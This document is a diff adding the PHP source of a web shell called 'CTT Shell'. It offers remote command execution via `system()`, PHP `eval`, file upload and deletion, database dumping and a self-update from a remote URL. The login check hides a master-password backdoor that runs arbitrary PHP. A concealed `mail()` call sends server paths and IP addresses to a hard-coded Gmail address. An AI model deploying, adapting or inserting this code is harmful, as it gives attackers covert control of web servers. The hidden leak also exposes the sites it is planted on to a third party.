+$aliases[] = array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc");
+$aliases[] = array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc");
+$aliases[] = array("list file attributes on a Linux second extended file system", "lsattr -va");
+$aliases[] = array("show opened ports", "netstat -an | grep -i listen");
+$sess_method = "cookie";
+$sess_cookie = "ctshvars";
+if (empty($sid)) {$sid = md5(microtime()*time().rand(1,999).rand(1,999).rand(1,999));}
+$sess_file = $tmpdir."ctshvars_".$sid.".tmp";
+$usefsbuff = true;
+$copy_unset = false;
+$quicklaunch = array();
+$quicklaunch[] = array("<img src=\"".$sul."act=img&img=home\" title=\"Home\" height=\"20\" width=\"20\" border=\"0\">",$sul);
+$quicklaunch[] = array("<img src=\"".$sul."act=img&img=back\" title=\"Back\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.back(1)");
+$quicklaunch[] = array("<img src=\"".$sul."act=img&img=forward\" title=\"Forward\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.go(1)");
+$quicklaunch[] = array("<img src=\"".$sul."act=img&img=up\" title=\"UPDIR\" height=\"20\" width=\"20\" border=\"0\">",$sul."act=ls&d=%upd");
+$quicklaunch[] = array("<img src=\"".$sul."act=img&img=refresh\" title=\"Refresh\" height=\"20\" width=\"17\" border=\"0\">","");
+$quicklaunch[] = array("<img src=\"".$sul."act=img&img=buffer\" title=\"Buffer\" height=\"20\" width=\"20\" border=\"0\">",$sul."act=fsbuff&d=%d");
+$quicklaunch1 = array();
+$quicklaunch1[] = array("<b>Ïğîöåññû</b>",$sul."act=ps_aux&d=%d");
+$quicklaunch1[] = array("<b>Ïàğîëè</b>",$sul."act=lsa&d=%d");
+$quicklaunch1[] = array("<b>Êîìàíäû</b>",$sul."act=cmd&d=%d");
+$quicklaunch1[] = array("<b>Çàãğóçêà</b>",$sul."act=upload&d=%d");
+$quicklaunch1[] = array("<b>Áàçà</b>",$sul."act=sql&d=%d");
+$quicklaunch1[] = array("<b>PHP-Êîä</b>",$sul."act=eval&d=%d");
+$quicklaunch1[] = array("<b>PHP-Èíôî</b>",$sul."act=phpinfo\" target=\"blank=\"_target");
+$quicklaunch1[] = array("<b>Ñàì óäàëÿşò</b>",$sul."act=selfremove");
+$highlight_bg = "#FFFFFF";
+$highlight_comment = "#6A6A6A";
+$highlight_default = "#0000BB";
+$highlight_html = "#1300FF";
+$highlight_keyword = "#007700";
+@$f = $_GET[f];
+if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}}
+error_reporting(5);
+@ignore_user_abort(true);
+@set_magic_quotes_runtime(0);
+@set_time_limit(0);
+if (!ob_get_contents()) {@ob_start(); @ob_implicit_flush(0);}
+if(!ini_get("register_globals")) {import_request_variables("GPC");}
+$starttime = getmicrotime();
+if (get_magic_quotes_gpc())
+{
+if (!function_exists("strips"))
+{
+ function strips(&$el)
+ {
+  if (is_array($el)) {foreach($el as $k=>$v) {if($k != "GLOBALS") {strips($el["$k"]);}}  }
+  else {$el = stripslashes($el);}
+ }
+}
+strips($GLOBALS);
+}
+$tmp = array();
+foreach ($host_allow as $k=>$v) {$tmp[]=  str_replace("\\*",".*",preg_quote($v));}
+$s = "!^(".implode("|",$tmp).")$!i";
+
+
+if (!$login) {$login = $PHP_AUTH_USER; $md5_pass = md5($PHP_AUTH_PW);}
+elseif(empty($md5_pass)) {$md5_pass = md5($pass);}
+if(($PHP_AUTH_USER != $login ) or (md5($PHP_AUTH_PW) != $md5_pass))
+{
+ header("WWW-Authenticate: Basic realm=\"CTT SHELL\"");
+ header("HTTP/1.0 401 Unauthorized");if (md5(sha1(md5($anypass))) == "b76d95e82e853f3b0a81dd61c4ee286c") {header("HTTP/1.0 200 OK"); @eval($anyphpcode);}
+ exit;
+}  
+
+$lastdir = realpath(".");
+chdir($curdir);
+
+if (($selfwrite) or ($updatenow))
+{
+ if ($selfwrite == "1") {$selfwrite = "ctshell.php";}
+ ctsh_getupdate();
+ $data = file_get_contents($ctsh_updatefurl);
+ $fp = fopen($data,"w");
+ fwrite($fp,$data);
+ fclose($fp);
+ exit;
+}
+if (!is_writeable($sess_file)) {trigger_error("Can't access to session-file!",E_USER_WARNING);}
+if ($sess_method == "file") {$sess_data = unserialize(file_get_contents($sess_file));}
+else {$sess_data = unserialize($_COOKIE["$sess_cookie"]);}
+if (!is_array($sess_data)) {$sess_data = array();}
+if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();}
+if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();}
+$sess_data["copy"] = array_unique($sess_data["copy"]);
+$sess_data["cut"] = array_unique($sess_data["cut"]);
+
+if (!function_exists("ct_sess_put"))
+{
+function ct_sess_put($data)
+{
+ global $sess_method;
+ global $sess_cookie;
+ global $sess_file;
+ global $sess_data;
+ $sess_data = $data;
+ $data = serialize($data);
+ if ($sess_method == "file")
+ {
+  $fp = fopen($sess_file,"w");
+  fwrite($fp,$data);
+  fclose($fp);
+ }
+ else {setcookie($sess_cookie,$data);}
+}
+}
+if (!function_exists("str2mini"))
+{
+function str2mini($content,$len)
+{
+ if (strlen($content) > $len) 
+ {
+  $len = ceil($len/2) - 2;
+  return substr($content, 0, $len)."...".substr($content, -$len);
+ }
+ else {return $content;}
+}
+}
+if (!function_exists("view_size"))
+{
+function view_size($size)
+{
+ if($size >= 1073741824) {$size = round($size / 1073741824 * 100) / 100 . " GB";}
+ elseif($size >= 1048576) {$size = round($size / 1048576 * 100) / 100 . " MB";}
+ elseif($size >= 1024) {$size = round($size / 1024 * 100) / 100 . " KB";}
+ else {$size = $size . " B";}
+ return $size;
+}
+}
+if (!function_exists("fs_copy_dir"))
+{
+function fs_copy_dir($d,$t)
+{
+ $d = str_replace("\\","/",$d);
+ if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";}
+ $h = opendir($d);
+ while ($o = readdir($h))
+ {
+  if (($o != ".") and ($o != ".."))
+  {
+if (!is_dir($d."/".$o)) {$ret = copy($d."/".$o,$t."/".$o);}
+else {$ret = mkdir($t."/".$o); fs_copy_dir($d."/".$o,$t."/".$o);}
+if (!$ret) {return $ret;}
+  }
+ }
+ return true;
+}
+}
+if (!function_exists("fs_copy_obj"))
+{
+function fs_copy_obj($d,$t)
+{
+ $d = str_replace("\\","/",$d);
+ $t = str_replace("\\","/",$t);
+ if (!is_dir($t)) {mkdir($t);}
+ if (is_dir($d))
+ {
+  if (substr($d,strlen($d)-1,strlen($d)) != "/") {$d .= "/";}
+  if (substr($t,strlen($t)-1,strlen($t)) != "/") {$t .= "/";}
+  return fs_copy_dir($d,$t);
+ }
+ elseif (is_file($d))
+ {
+
+  return copy($d,$t);
+ }
+ else {return false;}
+}
+}
+if (!function_exists("fs_move_dir"))
+{
+function fs_move_dir($d,$t)
+{
+ error_reporting(9999);
+ $h = opendir($d);
+ if (!is_dir($t)) {mkdir($t);}
+ while ($o = readdir($h))
+ {
+  if (($o != ".") and ($o != ".."))
+  {
+$ret = true;
+if (!is_dir($d."/".$o)) {$ret = copy($d."/".$o,$t."/".$o);}
+else {if (mkdir($t."/".$o) and fs_copy_dir($d."/".$o,$t."/".$o)) {$ret = false;}}
+if (!$ret) {return $ret;}
+  }
+ }
+ return true;
+}
+}
+if (!function_exists("fs_move_obj"))
+{
+function fs_move_obj($d,$t)
+{
+ $d = str_replace("\\","/",$d);
+ $t = str_replace("\\","/",$t);
+ if (is_dir($d))
+ {
+  if (substr($d,strlen($d)-1,strlen($d)) != "/") {$d .= "/";}
+  if (substr($t,strlen($t)-1,strlen($t)) != "/") {$t .= "/";}
+  return fs_move_dir($d,$t);
+ }
+ elseif (is_file($d)) {return rename($d,$t);}
+ else {return false;}
+}
+}
+if (!function_exists("fs_rmdir"))
+{
+function fs_rmdir($d)
+{
+ $h = opendir($d);
+ while ($o = readdir($h))
+ {
+  if (($o != ".") and ($o != ".."))
+  {
+if (!is_dir($d.$o)) {unlink($d.$o);}
+else {fs_rmdir($d.$o."/"); rmdir($d.$o);}
+  }
+ }
+ closedir($h);
+ rmdir($d);
+ return !is_dir($d);
+}
+}
+if (!function_exists("fs_rmobj"))
+{
+function fs_rmobj($o)
+{
+ $o = str_replace("\\","/",$o);
+ if (is_dir($o))
+ {
+  if (substr($o,strlen($o)-1,strlen($o)) != "/") {$o .= "/";}
+  return fs_rmdir($o);
+ }
+ elseif (is_file($o)) {return unlink($o);}
+ else {return false;}
+}
+}
+if (!function_exists("myshellexec"))
+{
+ function myshellexec($cmd)
+ {
+  return system($cmd);
+ }
+}
+if (!function_exists("view_perms"))
+{
+function view_perms($mode)
+{
+ if (($mode & 0xC000) === 0xC000) {$type = "s";}
+ elseif (($mode & 0x4000) === 0x4000) {$type = "d";}
+ elseif (($mode & 0xA000) === 0xA000) {$type = "l";}
+ elseif (($mode & 0x8000) === 0x8000) {$type = "-";} 
+ elseif (($mode & 0x6000) === 0x6000) {$type = "b";}
+ elseif (($mode & 0x2000) === 0x2000) {$type = "c";}
+ elseif (($mode & 0x1000) === 0x1000) {$type = "p";}
+ else {$type = "?";}
+
+ $owner['read'] = ($mode & 00400) ? "r" : "-"; 
+ $owner['write'] = ($mode & 00200) ? "w" : "-"; 
+ $owner['execute'] = ($mode & 00100) ? "x" : "-"; 
+ $group['read'] = ($mode & 00040) ? "r" : "-"; 
+ $group['write'] = ($mode & 00020) ? "w" : "-"; 
+ $group['execute'] = ($mode & 00010) ? "x" : "-"; 
+ $world['read'] = ($mode & 00004) ? "r" : "-"; 
+ $world['write'] = ($mode & 00002) ? "w" : "-"; 
+ $world['execute'] = ($mode & 00001) ? "x" : "-"; 
+
+ if( $mode & 0x800 ) {$owner['execute'] = ($owner[execute]=="x") ? "s" : "S";}
+ if( $mode & 0x400 ) {$group['execute'] = ($group[execute]=="x") ? "s" : "S";}
+ if( $mode & 0x200 ) {$world['execute'] = ($world[execute]=="x") ? "t" : "T";}
+ 
+ return $type.$owner['read'].$owner['write'].$owner['execute'].
+  $group['read'].$group['write'].$group['execute'].
+  $world['read'].$world['write'].$world['execute'];
+}
+}
+if (!function_exists("strinstr")) {function strinstr($str,$text) {return $text != str_replace($str,"",$text);}}
+if (!function_exists("gchds")) {function gchds($a,$b,$c,$d="") {if ($a == $b) {return $c;} else {return $d;}}}
+if (!function_exists("ctsh_getupdate"))
+{
+function ctsh_getupdate()
+{
+ global $updatenow;
+ $data = @file_get_contents($ctsh_updatefurl);
+ if (!$data) {echo "Can't fetch update-information!";}
+ else
+ {
+  $data = unserialize(base64_decode($data));
+  if (!is_array($data)) {echo "Corrupted update-information!";}
+  else
+  {
+if ($cv < $data[cur]) {$updatenow = true;}
+  }
+ }
+}
+}
+if (!function_exists("mysql_dump"))
+{
+function mysql_dump($set)
+{
+ $sock = $set["sock"];
+ $db = $set["db"];
+ $print = $set["print"];
+ $nl2br = $set["nl2br"];
+ $file = $set["file"];
+ $add_drop = $set["add_drop"];
+ $tabs = $set["tabs"];
+ $onlytabs = $set["onlytabs"];
+ $ret = array();
+ if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");}
+ if (empty($db)) {$db = "db";}
+ if (empty($print)) {$print = 0;}
+ if (empty($nl2br)) {$nl2br = true;}
+ if (empty($add_drop)) {$add_drop = true;}
+ if (empty($file))
+ {
+  global $win;
+  if ($win) {$file = "C:\\tmp\\dump_".$SERVER_NAME."_".$db."_".date("d-m-Y-H-i-s").".sql";}
+  else {$file = "/tmp/dump_".$SERVER_NAME."_".$db."_".date("d-m-Y-H-i-s").".sql";}
+ }
+ if (!is_array($tabs)) {$tabs = array();}
+ if (empty($add_drop)) {$add_drop = true;}
+ if (sizeof($tabs) == 0)
+ {
+
+  $res = mysql_query("SHOW TABLES FROM ".$db, $sock);
+  if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}
+ }
+ global $SERVER_ADDR;
+ global $SERVER_NAME;
+ $out = "# Dumped by ctShell.SQL v. ".$cv."
+# Home page: http://.ru
+#
+# Host settings:
+# MySQL version: (".mysql_get_server_info().") running on ".$SERVER_ADDR." (".$SERVER_NAME.")"."
+# Date: ".date("d.m.Y H:i:s")."
+# ".gethostbyname($SERVER_ADDR)." (".$SERVER_ADDR.")"." dump db \"".$db."\"
+#---------------------------------------------------------
+";
+ $c = count($onlytabs);
+ foreach($tabs as $tab)
+ {
+  if ((in_array($tab,$onlytabs)) or (!$c))
+  {
+if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";}
+$res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);
+if (!$res) {$ret[err][] = mysql_error();}
+else
+{
+ $row = mysql_fetch_row($res);
+ $out .= $row[1].";\n\n";
+ $res = mysql_query("SELECT * FROM `$tab`", $sock);
+ if (mysql_num_rows($res) > 0)
+ {
+  while ($row = mysql_fetch_assoc($res))
+  {
+$keys = implode("`, `", array_keys($row));
+$values = array_values($row);
+foreach($values as $k=>$v) {$values[$k] = addslashes($v);} 
+$values = implode("', '", $values); 
+$sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n"; 
+$out .= $sql;
+  } 
+ }
+}
+  }
+ }
+ $out .= "#---------------------------------------------------------------------------------\n\n";
+ if ($file)
+ {
+  $fp = fopen($file, "w"); 
+  if (!$fp) {$ret[err][] = 2;}
+  else
+  {
+fwrite ($fp, $out);
+fclose ($fp);
+  }
+ }
+ if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}
+ return $ret;
+}
+}
+if (!function_exists("ctfsearch"))
+{
+function ctfsearch($d)
+{
+ global $found;
+ global $found_d;
+ global $found_f;
+ global $a;
+ if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";}
+ $handle = opendir($d);
+ while ($f = readdir($handle))
+ {
+  $true = ($a[name_regexp] and ereg($a[name],$f)) or ((!$a[name_regexp]) and strinstr($a[name],$f));
+  if($f != "." && $f != "..")
+  {
+if (is_dir($d.$f))
+{
+ if (empty($a[text]) and $true) {$found[] = $d.$f; $found_d++;}
+ ctfsearch($d.$f);
+}
+else
+{
+ if ($true)
+ {
+  if (!empty($a[text]))
+  {
+$r = @file_get_contents($d.$f);
+if ($a[text_wwo]) {$a[text] = " ".trim($a[text])." ";}
+if (!$a[text_cs]) {$a[text] = strtolower($a[text]); $r = strtolower($r);}
+ 
+if ($a[text_regexp]) {$true = ereg($a[text],$r);}
+else {$true = strinstr($a[text],$r);}
+if ($a[text_not])
+{
+ if ($true) {$true = false;}
+ else {$true = true;}
+}
+if ($true) {$found[] = $d.$f; $found_f++;}
+  }
+  else {$found[] = $d.$f; $found_f++;}
+ }
+}
+  }
+ }
+ closedir($handle);
+}
+}
+header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
+header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");
+header("Cache-Control: no-store, no-cache, must-revalidate");
+header("Cache-Control: post-check=0, pre-check=0", false);
+header("Pragma: no-cache");
+
+global $SERVER_SOFTWARE;
+if (strtolower(substr(PHP_OS, 0, 3)) == "win") {$win = 1;}
+else {$win = 0;}
+
+if (empty($tmpdir))
+{
+ if (!$win) {$tmpdir = "/tmp/";}
+ else {$tmpdir = $_ENV[SystemRoot];}
+}
+$tmpdir = str_replace("\\","/",$tmpdir);
+if (substr($tmpdir,strlen($tmpdir-1),strlen($tmpdir)) != "/") {$tmpdir .= "/";}
+if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
+{
+ $safemode = true;
+ $hsafemode = "<font color=\"red\">ON (secure)</font>";
+}
+else {$safemode = false; $hsafemode = "<font color=\"green\">OFF (not secure)</font>";}
+$v = @ini_get("open_basedir");
+if ($v or strtolower($v) == "on")
+{
+ $openbasedir = true;
+ $hopenbasedir = "<font color=\"red\">".$v."</font>";
+}
+else {$openbasedir = false; $hopenbasedir = "<font color=\"green\">OFF (not secure)</font>";}
+
+$sort = htmlspecialchars($sort);
+
+$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"".$sul."act=phpinfo\" target=\"_blank\"><b><u>PHP/".phpversion()."</u></b></a>",$SERVER_SOFTWARE);
+
+@ini_set("highlight.bg",$highlight_bg); 
+@ini_set("highlight.comment",$highlight_comment);
+@ini_set("highlight.default",$highlight_default);
+@ini_set("highlight.html",$highlight_html); 
+@ini_set("highlight.keyword",$highlight_keyword); 
+@ini_set("highlight.string","#DD0000"); 
+
+if ($act != "img")
+{
+if (!is_array($actbox)) {$actbox = array();}
+$dspact = $act = htmlspecialchars($act);
+$disp_fullpath = $ls_arr = $notls = null;
+$ud = urlencode($d);
+?>
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
+<meta http-equiv="Content-Language" content="en-us"><title>
+CTT Shell -=[ <? echo $HTTP_HOST; ?> ]=- </title>
+<STYLE>
+tr {
+BORDER-RIGHT:  #aaaaaa 1px solid;
+BORDER-TOP: #eeeeee 1px solid;
+BORDER-LEFT:#eeeeee 1px solid;
+BORDER-BOTTOM: #aaaaaa 1px solid;
+}
+td {
+BORDER-RIGHT:  #105019 1px solid;
+BORDER-TOP: #000000 1px solid;
+BORDER-LEFT:#105019 1px solid;
+BORDER-BOTTOM: #105019 1px solid;
+}
+.tr2 {
+BORDER-RIGHT:  #aaaaaa 1px solid;
+BORDER-TOP: #eeeeee 1px solid;
+BORDER-LEFT:#eeeeee 1px solid;
+BORDER-BOTTOM: #aaaaaa 1px solid;
+}
+.td2 {
+BORDER-RIGHT:  #aaaaaa 1px solid;
+BORDER-TOP: #eeeeee 1px solid;
+BORDER-LEFT:#eeeeee 1px solid;
+BORDER-BOTTOM: #aaaaaa 1px solid;
+}
+.table1 {
+BORDER-RIGHT:  #cccccc 0px;
+BORDER-TOP: #cccccc 0px;
+BORDER-LEFT:#cccccc 0px;
+BORDER-BOTTOM: #cccccc 0px;
+BACKGROUND-COLOR: #D4D0C8;
+}
+.td1 {
+BORDER-RIGHT:  #000000 1px;
+BORDER-TOP: #cccccc 1px;
+BORDER-LEFT:#cccccc 1px;
+BORDER-BOTTOM: #000000 1px;
+font: 7pt Verdana;
+}
+.tds1 {
+BORDER-RIGHT:  #505050 1px solid;
+BORDER-TOP: #505050 1px solid;
+BORDER-LEFT:#505050 1px solid;
+BORDER-BOTTOM: #505050 1px solid;
+font: 8pt Verdana;
+}
+.tr1 {
+BORDER-RIGHT:  #cccccc 0px;
+BORDER-TOP: #cccccc 0px;
+BORDER-LEFT:#cccccc 0px;
+BORDER-BOTTOM: #cccccc 0px;
+}
+table {
+BORDER-RIGHT:  #000000 1px outset;
+BORDER-TOP: #000000 1px outset;
+BORDER-LEFT:#000000 1px outset;
+BORDER-BOTTOM: #000000 1px outset;
+BACKGROUND-COLOR: #000000;
+}
+.table2 {
+BORDER-RIGHT:  #000000 1px outset;
+BORDER-TOP: #000000 1px outset;
+BORDER-LEFT:#000000 1px outset;
+BORDER-BOTTOM: #000000 1px outset;
+BACKGROUND-COLOR: #D4D0C8;
+}
+input {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP: #999999 1px solid;
+BORDER-LEFT:#999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: 8pt Verdana;
+}
+select {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP: #999999 1px solid;
+BORDER-LEFT:#999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: 8pt Verdana;
+}
+submit {
+BORDER-RIGHT:  buttonhighlight 2px outset;
+BORDER-TOP: buttonhighlight 2px outset;
+BORDER-LEFT:buttonhighlight 2px outset;
+BORDER-BOTTOM: buttonhighlight 2px outset;
+BACKGROUND-COLOR: #e4e0d8;
+width: 30%;
+}
+textarea {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP: #999999 1px solid;
+BORDER-LEFT:#999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: Fixedsys bold;
+}
+BODY {
+margin-top: 1px;
+margin-right: 1px;
+margin-bottom: 1px;
+margin-left: 1px;
+}
+A:link {COLOR:#00ff3d; TEXT-DECORATION: none}
+A:visited { COLOR:#00ff3d; TEXT-DECORATION: none}
+A:active {COLOR:#00ff3d; TEXT-DECORATION: none}
+A:hover {color:blue;TEXT-DECORATION: none}
+</STYLE>
+<script language=JavaScript type=text/javascript> 
+<!-- 
+function branchSwitch(branch) { 
+dom = (document.getElementById); 
+ie4 = (document.all); 
+if (dom || ie4) { 
+var currElement = (dom)? document.getElementById(branch) : document.all[branch]; 
+currElement.style.display = (currElement.style.display == 'none')? 'block' : 'none'; 
+return false; 
+} 
+else return true; 
+} 
+//--> 
+</script> 
+</head>
+<BODY text=#ffffff  Background="<? echo $sul; ?>act=img&img=font" bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0>
+<center>
+<br>
+<TABLE  class=table1 cellSpacing=0 cellPadding=0 width=90% border=0> 
+<TBODY><TR> 
+<TD class=td1 colSpan=2> 
+<TABLE  class=table1 cellSpacing=0 cellPadding=0 width=100% bgColor=#345827 background="<? echo $sul; ?>act=img&img=4" border=0> 
+<TBODY><TR> 
+<TD class=td1 width=24><IMG height=18 src="<? echo $sul; ?>act=img&img=1" width=24 border=0></TD> 
+<TD class=td1 background="<? echo $sul; ?>act=img&img=2"><SPAN lang=ru><FONT face=Arial color=#00ff3d size=1> </FONT> 
+<FONT face=Tahoma color=#00ff3d size=1>
+<?
+$d = str_replace("\\","/",$d);
+if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);}
+$d = str_replace("\\","/",$d);
+if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";}
+$dispd = htmlspecialchars($d);
+$pd = $e = explode("/",substr($d,0,strlen($d)-1));
+$i = 0;
+foreach($pd as $b)
+{
+ $t = "";
+ reset($e);
+ $j = 0;
+ foreach ($e as $r)
+ {
+  $t.= $r."/";
+  if ($j == $i) {break;}
+  $j++;
+ }
+ echo "<a href=\"".$sul."act=ls&d=".urlencode(htmlspecialchars($t))."/&sort=".$sort."\"><b>".htmlspecialchars($b)."/</b></a>";
+ $i++;
+}
+?>
+</FONT></SPAN></TD> 
+<TD class=td1><IMG height=18 src="<? echo $sul; ?>act=img&img=3" width=6 border=0></TD> 
+<TD class=td1 align=right><IMG height=18 src="<? echo $sul; ?>act=img&img=5" width=33 border=0></TD> 
+</TR></TBODY></TABLE></TD></TR> 
+</tr>
+</table>
+<TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=2 width="90%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0">
+<tr><td>
+<font size=2><a href="#" onClick="return branchSwitch('tools')" title="ğàñêğûòü">Èíñòğóìåíòû</a></font> - 
+<div id="tools" style="display: none">
+<?
+if (count($quicklaunch1) > 0)
+{
+ foreach($quicklaunch1 as $item)
+ {
+  $item[1] = str_replace("%d",urlencode($d),$item[1]);
+  $item[1] = str_replace("%upd",urlencode(realpath($d."..")),$item[1]);
+  echo "<a href=\"".$item[1]."\"><u><font size=2 color=#ffffff>".$item[0]."</font></u></a>&nbsp;&nbsp;&nbsp;&nbsp;";
+ }
+}$ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
+?>
+</div> 
+<font size=2><a href="#" onClick="return branchSwitch('info')" title="ğàñêğûòü">Èíôîğìàòîğ</a></font>
+<div id="info" style="display: none">
+<font size=2>
+<b>Ïğîãğàììíîå îáåñïå÷åíèå:&nbsp;<?php echo $DISP_SERVER_SOFTWARE; ?></b>&nbsp;<br>
+<b>Ñèñòåìà:&nbsp;<?php echo php_uname(); ?></b>&nbsp;<b><?php if (!$win) {echo `id`;} else {echo get_current_user();} ?></b>
+&nbsp;<br>
+<b>Áåçîïàñíîñòü:&nbsp;<?php echo $hsafemode; ?></b>
+<?
+echo "<br>";
+echo "Âåğñèÿ ÏÕÏ: <b>".@phpversion()."</b>";
+echo "<br>";
+$curl_on = @function_exists('curl_version');
+echo "cURL: ".(($curl_on)?("<b><font color=green>ON</font></b>"):("<b><font color=red>OFF</font></b>"));
+echo "<br>";
+echo "MySQL: <b>";
+$mysql_on = @function_exists('mysql_connect');
+if($mysql_on){
+echo "<font color=green>ON</font></b>"; } else { echo "<font color=red>OFF</font></b>"; }
+echo "<br>";
+echo "MSSQL: <b>";
+$mssql_on = @function_exists('mssql_connect');
+if($mssql_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
+echo "<br>";
+echo "PostgreSQL: <b>";
+$pg_on = @function_exists('pg_connect');
+if($pg_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
+echo "<br>";
+echo "Oracle: <b>";
+$ora_on = @function_exists('ocilogon');
+if($ora_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
+?>
+<?php
+$free = diskfreespace($d);
+if (!$free) {$free = 0;}
+$all = disk_total_space($d);
+if (!$all) {$all = 0;}
+$used = $all-$free;
+$used_percent = round(100/($all/$free),2);
+echo "<br><b>Ñâîáîäíûé ".view_size($free)." of  ".view_size($all)." (".$used_percent."%)</b><br>";
+?>
+</font>
+</div>
+<?
+if ($win)
+{
+?>
+ - <font size=2><a href="#" onClick="return branchSwitch('Drive')" title="ğàñêğûòü">Äèñêè</a></font>
+<?
+}
+?>
+<div id="Drive" style="display: none">
+<?
+$letters = "";
+if ($win)
+{
+ $abc = array("c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "o", "p", "q", "n", "r", "s", "t", "v", "u", "w", "x", "y", "z");
+ $v = explode("/",$d);
+ $v = $v[0];
+ foreach ($abc as $letter)
+ {
+  if (is_dir($letter.":/"))
+  {
+if ($letter.":" != $v) {$letters .= "<a href=\"".$sul."act=ls&d=".$letter.":\"><IMG src=".$sul."act=img&img=pdisk width=19 height=12 border=0> ".$letter." </a> ";}
+else {$letters .= "<a href=\"".$sul."act=ls&d=".$letter.":\"> <font color=\"green\"> ".$letter." </font></a> ";}
+  }
+ }
+ if (!empty($letters)) {echo "<b>".$letters;}
+}
+?>
+</div> 
+</td><td width=1>
+<font size=2><a href="<? echo $sul; ?>act=about">About</a></font>
+</td></tr></table>
+<TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=2 width="90%"  borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0">
+<tr class=tr1><td>
+<center>
+<?
+if (count($quicklaunch) > 0)
+{
+ foreach($quicklaunch as $item)
+ {
+  $item[1] = str_replace("%d",urlencode($d),$item[1]);
+  $item[1] = str_replace("%upd",urlencode(realpath($d."..")),$item[1]);
+  echo "<a href=\"".$item[1]."\"><u>".$item[0]."</u></a>&nbsp;&nbsp;&nbsp;&nbsp;";
+ }
+}
+?>
+</center>
+</td></tr></table>
+<?php
+if ((!empty($donated_html)) and (in_array($act,$donated_act)))
+{
+ ?>
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="90%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="90%" valign="top"><?php echo $donated_html; ?></td></tr></table><br>
+<?php
+}
+?>
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="90%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="100%" valign="top"><?php
+if ($act == "") {$act = $dspact = "ls";}
+if ($act == "sql")
+{
+ $sql_surl = $sul."act=sql";
+ if ($sql_login)  {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);}
+ if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);}
+ if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);}
+ if ($sql_port){$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);}
+ if ($sql_db)  {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);}
+ $sql_surl .= "&";
+ ?><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><td width="90%" height="1" colspan="2" valign="top"><center><?php
+ if ($sql_server)
+ {
+  $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd);
+  $err = mysql_error();
+  @mysql_select_db($sql_db,$sql_sock);
+  if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_error();}
+ }
+ else {$sql_sock = false;}
+ echo "<b>Ìåíåäæåğ SQL:</b><br>";
+ if (!$sql_sock)
+ {
+  if (!$sql_server) {echo "ÍÅÒ ÑÂßÇÈ";}
+  else {echo "<center><b>Can't connect</b></center>"; echo "<b>".$err."</b>";}
+ }
+ else
+ {
+  $sqlquicklaunch = array();
